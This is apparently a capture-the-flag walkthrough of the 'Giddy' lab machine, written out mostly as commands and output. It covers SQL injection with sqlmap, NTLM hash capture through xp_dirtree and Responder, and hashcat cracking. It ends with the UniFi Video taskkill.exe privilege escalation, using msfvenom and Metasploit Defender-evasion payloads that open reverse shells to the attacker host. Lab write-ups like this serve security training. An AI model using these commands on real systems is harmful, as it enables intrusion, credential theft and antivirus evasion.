Giddy

Port Scanning

I use RustScan to scan all ports fast, then use nmap to run scripts and version scan. We have a web app (80,443), RDP (3389), and WinRM (5985)

rustscan -a 10.10.10.104
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open 10.10.10.104:80
Open 10.10.10.104:443
Open 10.10.10.104:3389
Open 10.10.10.104:5985

nmap -sCV -O -oA GiddyScan -p 80,443,3389,5985 -vvv 10.10.10.104
PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

Running (JUST GUESSING): Microsoft Windows 2016 (89%)
Nmap done: 1 IP address (1 host up) scanned in 29.06 seconds

Web app

The web app home page shows a dog with a giddy face. So I started running a directory brute force

Found: aspnet_client, remote, mvc

ffuf -w /usr/share/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://10.10.10.104:80/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

aspnet_client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 88ms]
remote                  [Status: 302, Size: 157, Words: 6, Lines: 4, Duration: 80ms]
Aspnet_client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 82ms]
mvc                     [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 677ms]
aspnet_Client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 79ms]
Remote                  [Status: 302, Size: 157, Words: 6, Lines: 4, Duration: 80ms]
ASPNET_CLIENT           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 80ms]
Aspnet_Client           [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 92ms]
:: Progress: [62281/62281] :: Job [1/1] :: 49 req/sec :: Duration: [0:02:34] :: Errors: 0 ::

aspnet_client return 404

Can't use remote with http, so used https, and it's an authenticated PowerShell web access, so have to look for credentials.

mvc looks like a web app for an online store

Create an account

Now, after creating an account but it doesn't make a difference.

When you view any of the products, the web app gets it by id, so the first idea is to test for SQLi

Types of SQL Injection (SQLi) - GeeksforGeeksGeeksforGeeks

SQL Injection cheatsheetphrack.me

Found the web app vulnerable to Error-Based SQL Injections (2). Knew that there are 25 columns (3,4). Knew the version (5).

Dumping the database seems like the best option here.

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 --dbs
[09:06:38] [WARNING] reflective value(s) found and filtering out
available databases [5]:
[*] Injection
[*] master
[*] model
[*] msdb
[*] tempdb

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 -D injection -tables
Database: injection
[13 tables]
+-----------------------+
| Applications          |
| CreditCard            |
| Memberships           |
| Product               |
| ProductCategory       |
| ProductSubcategory    |
| Profiles              |
| Roles                 |
| Users                 |
| UsersInRoles          |
| UsersOpenAuthAccounts |
| UsersOpenAuthData     |
| __MigrationHistory    |
+-----------------------+

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 -D injection -T Users --dump
[09:13:15] [WARNING] reflective value(s) found and filtering out
Database: injection
Table: Users
[1 entry]
+--------------------------------------+--------------------------------------+----------+-------------+-------------------------+
| UserId                               | ApplicationId                        | UserName | IsAnonymous | LastActivityDate        |
+--------------------------------------+--------------------------------------+----------+-------------+-------------------------+
| 694AE2D4-BF48-4144-A4B4-6FE59AE8ECD5 | C81A95C0-2420-4091-A662-96DB246A1998 | legend   | NULL        | 2025-06-11T12:56:11.007 |
+--------------------------------------+--------------------------------------+----------+-------------+-------------------------+

Got only the account I created. SQLmap has an OS Exploitation function, so why not try it?

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26" --batch --level=5 --risk=3 --os-shell
[09:16:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016 or 2022 or 2019 or 11
web application technology: Microsoft IIS 10.0, ASP.NET, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2016
[09:16:16] [INFO] testing if current user is DBA
[09:16:16] [WARNING] functionality requested probably does not work because the current session user is not a database administrator. You can try to use option '--dbms-cred' to execute statements as a DBA user if you were able to extract and crack a DBA password by any mean
[09:16:17] [WARNING] reflective value(s) found and filtering out
[09:16:17] [INFO] testing if xp_cmdshell extended procedure is usable
[09:16:18] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:16:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:19] [ERROR] unable to retrieve xp_cmdshell output
[09:16:19] [INFO] going to use extended procedure 'xp_cmdshell' for operating system command execution
[09:16:19] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[09:16:50] [INFO] retrieved: 0
No output
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] Y
[09:16:59] [INFO] retrieved: 0
No output

Since it didn't work, we can't try to get MSSQL Hash

How to capture MSSQL credentials with xp_dirtree, smbserver.pyMedium

sudo responder -I tun0

18; EXEC master.sys.xp_dirtree '\\10.10.16.7\myshare',1 ,1

Crack the hash with hashcat.

hashcat.exe -m 5600 ntlm.txt rockyou.txt

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

STACY::GIDDY:47396642dcedd356:2bfe99922bf2d6f03f6760646af97ec4:010100000000000000ef0f2723d9db018f1293ae141ae3c40000000002000800480031004600330001001e00570049004e002d00480048003900390045004b005800560050005200550004003400570049004e002d00480048003900390045004b00580056005000520055002e0048003100460033002e004c004f00430041004c000300140048003100460033002e004c004f00430041004c000500140048003100460033002e004c004f00430041004c000700080000ef0f2723d9db01060004000200000008003000300000000000000000000000003000007db545ef0cc6ca56d7cba2261ba6569eb5179edb4f8fda18498a2a832a1e83020a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003700000000000000000000000000:xNnWo6272k7x

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: STACY::GIDDY:47396642dcedd356:2bfe99922bf2d6f03f676...000000
Time.Started.....: Mon Jun 09 16:52:19 2025 (1 sec)
Time.Estimated...: Mon Jun 09 16:52:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14097.2 kH/s (8.02ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3932160/14344384 (27.41%)
Rejected.........: 0/3932160 (0.00%)
Restore.Point....: 1966080/14344384 (13.71%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: brageeny -> seaford123
Hardware.Mon.#1..: Temp: 56c Fan:  0% Util:  6% Core:1950MHz Mem:6801MHz Bus:16

Started: Mon Jun 09 16:52:17 2025
Stopped: Mon Jun 09 16:52:21 2025

Shell as stacy

evil-winrm -i 10.10.10.104 -u stacy -p xNnWo6272k7x
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacy

To get low-hanging fruit, I use PEAS, but this one on password check took like 15 min

PEASS-ng/winPEAS/winPEASps1 at master · peass-ng/PEASS-ngGitHub

# My machine
wget https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1
python3 -m http.server 8000

# Giddy Machine
*Evil-WinRM* PS C:\Users\Stacy\Documents> wget http://10.10.16.7:8000/winPEAS.ps1 -o winPEAS.ps1
*Evil-WinRM* PS C:\Users\Stacy\Documents> ls


    Directory: C:\Users\Stacy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/17/2018   9:36 AM              6 unifivideo
-a----         6/9/2025  12:23 PM          81036 winPEAS.ps1


*Evil-WinRM* PS C:\Users\Stacy\Documents> cat unifivideo
stop

*Evil-WinRM* PS C:\Users\Stacy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
*Evil-WinRM* PS C:\Users\Stacy\Documents> .\winPEAS.ps1

PowerShell History is good to look at, could find a credentials.

=========|| PowerShell History (Password Search Only)
=|| PowerShell Console History
=|| To see all history, run this command: Get-Content (Get-PSReadlineOption).HistorySavePath
Cannot find path 'C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt' because it does not exist.
At C:\users\stacy\downloads\winPEAS.ps1:1386 char:14
+ ... rite-Host $(Get-Content (Get-PSReadLineOption).HistorySavePath | Sele ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Stacy\...ost_history.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand

=|| AppData PSReadline Console History
=|| To see all history, run this command: Get-Content C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

=|| PowerShell default transcript history check

There is a service named unifivideoservice, after searching it found that it's related to UniFi Video software.

*Evil-WinRM* PS C:\Users\Stacy\Documents> Get-Content C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net stop unifivideoservice
$ExecutionContext.SessionState.LanguageMode
Stop-Service -Name Unifivideoservice -Force
Get-Service -Name Unifivideoservice
whoami
Get-Service -ServiceName UniFiVideoService

search for vulnerabilities related to UniFi Video, and there is a local privilege escalation.

Ubiquiti UniFi Video 3.7.3 - Local Privilege EscalationExploit Database

5. VULNERABILITY DETAILS
========================
Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\"
by default and is also shipped with a service called "Ubiquiti UniFi Video". Its
executable "avService.exe" is placed in the same directory and also runs under
the NT AUTHORITY/SYSTEM account.

However the default permissions on the "C:\ProgramData\unifi-video" folder are
inherited from "C:\ProgramData" and are not explicitly overridden, which allows
all users, even unprivileged ones, to append and write files to the application
directory:

c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Upon start and stop of the service, it tries to load and execute the file at
"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in
the application directory by default at all.

By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an
unprivileged user, it is therefore possible to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM.

The folder has the same permissions.

*Evil-WinRM* PS C:\Users\Stacy\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files

Now creating a payload to get a reverse shell as an administrator.

# my machine
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.7 -f exe -o taskkill.exe LPORT=4444

# Giddy
*Evil-WinRM* PS C:\programdata> cd unifi-video
*Evil-WinRM* PS C:\programdata\unifi-video> wget 10.10.16.7:8000/taskkill.exe -o taskkill.exe
*Evil-WinRM* PS C:\programdata\unifi-video> Stop-Service -Name Unifivideoservice -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...

There is a problem with the payload that doesn't give a shell. Maybe an AV?

# Defender Status
*Evil-WinRM* PS C:\programdata\unifi-video> Get-MpComputerStatus
Cannot connect to CIM server. Access denied 
At line:1 char:1
+ Get-MpComputerStatus
+ ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (MSFT_MpComputerStatus:String) [Get-MpComputerStatus], CimJobException
    + FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpComputerStatus
    
# Running Processes for AV Clues
*Evil-WinRM* PS C:\programdata\unifi-video> Get-Process | Where-Object { $_.Name -match "av|defend|sec|symantec|mcafee|carbon|cylance|sentinel|crowd|kaspersky" }

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1164      56   341472     196788              2020   0 avService

Found a couple of articles about AV evasion and tried a couple of those 'AV Bypass with Metasploit Templates and Custom Binaries by Red Team Notes', but it didn't work.

*Evil-WinRM* PS C:\programdata\unifi-video> .\taskkill.exe
Program 'taskkill.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Since MSF has evasion so why not try it?

msf6 > search evasion

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank    Check  Description
   -   ----                                                 ---------------  ----    -----  -----------
   0   evasion/windows/applocker_evasion_install_util       .                normal  No     Applocker Evasion - .NET Framework Installation Utility
   1   evasion/windows/applocker_evasion_msbuild            .                normal  No     Applocker Evasion - MSBuild
   2   evasion/windows/applocker_evasion_regasm_regsvcs     .                normal  No     Applocker Evasion - Microsoft .NET Assembly Registration Utility
   3   evasion/windows/applocker_evasion_workflow_compiler  .                normal  No     Applocker Evasion - Microsoft Workflow Compiler
   4   evasion/windows/applocker_evasion_presentationhost   .                normal  No     Applocker Evasion - Windows Presentation Foundation Host
   5   evasion/windows/syscall_inject                       .                normal  No     Direct windows syscall evasion technique
   6   exploit/unix/webapp/php_eval                         2008-10-13       manual  Yes    Generic PHP Code Evaluation
   7   evasion/windows/windows_defender_exe                 .                normal  No     Microsoft Windows Defender Evasive Executable
   8   evasion/windows/windows_defender_js_hta              .                normal  No     Microsoft Windows Defender Evasive JS.Net and HTA
   9   evasion/windows/process_herpaderping                 .                normal  No     Process Herpaderping evasion technique
   10    \_ target: Microsoft Windows (x64)                 .                .       .      .
   11    \_ target: Microsoft Windows (x86)                 .                .       .      .
   12  post/windows/gather/checkvm                          .                normal  No     Windows Gather Virtual Environment Detection
   
msf6 > use 7

Setup everything

msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > options 

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  NnfRT.exe        yes       Filename for the evasive file (default: random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows



View the full module info with the info, or info -d command.

msf6 evasion(windows/windows_defender_exe) > set lhost tun0
lhost => 10.10.16.7
msf6 evasion(windows/windows_defender_exe) > set lport 8989
lport => 8989
msf6 evasion(windows/windows_defender_exe) > exploit

[*] Compiled executable size: 4096
[+] NnfRT.exe stored at /home/legend/.msf4/local/NnfRT.exe

# Here I copied the payload to the directory I am in and changed its name to taskkill.exe

msf6 evasion(windows/windows_defender_exe) > cp /home/legend/.msf4/local/NnfRT.exe ~/Machines/Giddy/taskkill.exe
[*] exec: cp /home/legend/.msf4/local/NnfRT.exe ~/Machines/Giddy/taskkill.exe

Setup a listener for the payload

msf6 evasion(windows/windows_defender_exe) > use exploit/multi/handler
[*] Using configured payload windows/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options 

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.7       yes       The listen address (an interface may be specified)
   LPORT     8989             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

Start the service again and then transfer the payload and finaly stop the service.

*Evil-WinRM* PS C:\programdata\unifi-video> Start-Service -Name Unifivideoservice
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to start...
*Evil-WinRM* PS C:\programdata\unifi-video> wget 10.10.16.7:8000/taskkill.exe -o taskkill.exe
*Evil-WinRM* PS C:\programdata\unifi-video> Stop-Service -Name Unifivideoservice -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...

Shell as Administrator

[*] Started reverse TCP handler on 10.10.16.7:8989 
[*] Sending stage (177734 bytes) to 10.10.10.104
[*] Meterpreter session 1 opened (10.10.16.7:8989 -> 10.10.10.104:49871) at 2025-06-09 15:16:35 -0400

meterpreter > shell
Process 4628 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami
whoami
nt authority\system

Last updated 8 days ago

Was this helpful?